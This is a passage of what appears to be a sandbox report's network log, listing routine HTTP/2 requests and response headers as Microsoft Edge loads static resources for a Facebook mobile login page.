          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          origin: https://m.facebook.com
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: text/css; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Fri, 04 Apr 2025 16:53:24 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: wm+fsv2P+P6ZepOPpToaAQ==
          x-fb-debug: iVcsjUsB7TQcH186Iix1hH+HlmN03R8qoBbIHT/cTEtw76cXaGR73v8ZZtEZXLAuAmhKemWT54VwaNZ5pApyxw==
          content-length: 633
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=57, rtx=0, c=13, mss=1357, tbw=30727, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/2.0
          host: static.xx.fbcdn.net
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Fri, 04 Apr 2025 00:49:47 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: yucTxsRHV6L0COe+p6meag==
          x-fb-debug: aCDFuGmIsuf6cSC5HU/+70Oh4by3m0k33j5rqSCRNaTR1wsOkZBJfJsHDdMglkGNi7UcL+/6x1cxs2/bAQNeug==
          content-length: 84259
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=57, rtx=0, c=13, mss=1357, tbw=32578, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yZ/r/BH06mb1iMVv.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yZ/r/BH06mb1iMVv.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sun, 23 Mar 2025 15:51:20 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: Xo6UEc6M7Lw/LKfTZfdG5g==
          x-fb-debug: 9ge0T9Um4BpUdzrgGFD8F3RkPTl9AJxm2l+ndubLWy+acMcD2PqzkpnzxDzwTfn8vT2/A5Rr2weYyTtkllCVbw==
          content-length: 12393
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=53, rtx=0, c=113, mss=1357, tbw=117949, tp=-1, tpl=-1, uplat=3, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3inLb4/ye/l/en_GB/0TulGAoiC_B.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3inLb4/ye/l/en_GB/0TulGAoiC_B.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 15:39:43 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: DDUaJeH0X3OvviaJ9x2yeA==
          x-fb-debug: Z0zoPlUz70BpMtnqmrtvcczVHS9WmC2PKqnz0BoHwKxnXy1b+j8mFOLtj46qMEZgeptrdmsyXuBYyT6/wd4X/g==
          content-length: 25535
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=53, rtx=0, c=113, mss=1357, tbw=117949, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/gRUbdRyV8_6.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yB/r/gRUbdRyV8_6.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 15:39:43 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: KbeOHe30FdinmzkPFXw6Lw==
          x-fb-debug: 5mET49kWBjKWnM1OHghEGdMUX7/RTSXXo24+tUQgwmCnxsWsNWHsDUY999X4o0pGguzHDqfyzcAMP8Gyv8CFjA==
          content-length: 10298
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=53, rtx=0, c=113, mss=1357, tbw=117949, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/Q2m5KCTlZ52.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yJ/r/Q2m5KCTlZ52.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 15:39:43 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: PU5icyMmpp0z74h+LdeXZQ==
          x-fb-debug: mFJc7tbq3Q+RiPJkE8EBcrU6ErZtHOisKo744TyYHEtp3vmtn6KtcSfm5ZBAXBbUdwLxrk/AlB/3CxDhi2PRVA==
          content-length: 11279
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=53, rtx=0, c=113, mss=1357, tbw=119123, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/-wd1PaMuOAO.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/y1/r/-wd1PaMuOAO.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 17:20:57 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: Yh0GGh7Vo2WgruAy//vUfA==
          x-fb-debug: /f8/VCmbYzDKBJi3BBvQoHy4Vyl8evuBlP+Vs0G2EazpmDPqnARLyQsVbX76GZObt7oNmxGOxpsMykRUinl+dA==
          content-length: 8428
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=53, rtx=0, c=113, mss=1357, tbw=119123, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yA/r/BR1wPy2YANv.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yA/r/BR1wPy2YANv.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 15:43:41 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: eKUtBGUOz3KQsj6sMKGn2w==
          x-fb-debug: 9MOGffYirsWVRbevpO/6RIIxCQiN+QyUNntrSQu3OZibmmCAjLNrSXjBUOUGf2DmJSbFeIqSMoIBwppqrFrzQg==
          content-length: 24016
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=53, rtx=0, c=113, mss=1357, tbw=188766, tp=-1, tpl=-1, uplat=3, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3i3kA4/ya/l/en_GB/0ETxyloY5YV.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3i3kA4/ya/l/en_GB/0ETxyloY5YV.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 15:39:44 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: r79WOXtCYWkMwznMnVzebA==
          x-fb-debug: S9a8SXdH9jOfBkmqjau8bC2zY7fQbNT40ciG1uYNESRlfcHl5HV2H7fQjxCgemcm573Y8aicP7N1L4sE115j0A==
          content-length: 3891
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=213359, tp=-1, tpl=-1, uplat=0, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yz/r/diU6vAZ6EZ1.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yz/r/diU6vAZ6EZ1.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 15:39:44 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: g/9iVSCS6NsL4RyyrHLtwg==
          x-fb-debug: zWTR/34+8lYlovhnRN4IILxV2pgOpPfgtWD0YQQSbPASnDVzPVb9/1lT1Fs3i+Ng1WQMX1b1wJX/LhhLdDk9SA==
          content-length: 15034
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=213359, tp=-1, tpl=-1, uplat=0, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/150G_oxSMF5.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yp/r/150G_oxSMF5.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 23:24:40 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: lLXDx8WGq8YCCUzpzllM+Q==
          x-fb-debug: U3iHaIOhnYB3UFcA6KP4LcM/PCM5vTHzbJxzdOkRuvL3SzMP8n9aG4SeQgpiA+1iaAEgODwuVeykKuuZwkb8Iw==
          content-length: 34649
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=232364, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/ui2DkP-wt_7.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: application/x-javascript; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sat, 29 Mar 2025 02:59:37 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: k+R7eY3Xrv/nId1snIjgBw==
          x-fb-debug: jVeRk/4ajZQrLqXDiHuThxeiz/T8rlxrw3XUAoj8o3Nv76j4Z6dj/GbL9+s81fYBwBeZjrg7wkhs+sIyMoTYDg==
          content-length: 3489
          date: Thu, 04 Apr 2024 22:29:24 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=54, rtx=2, c=181, mss=1357, tbw=269443, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yA/r/QZ1D800hehn.js?_nc_x=Ij3Wp8lg5Kz
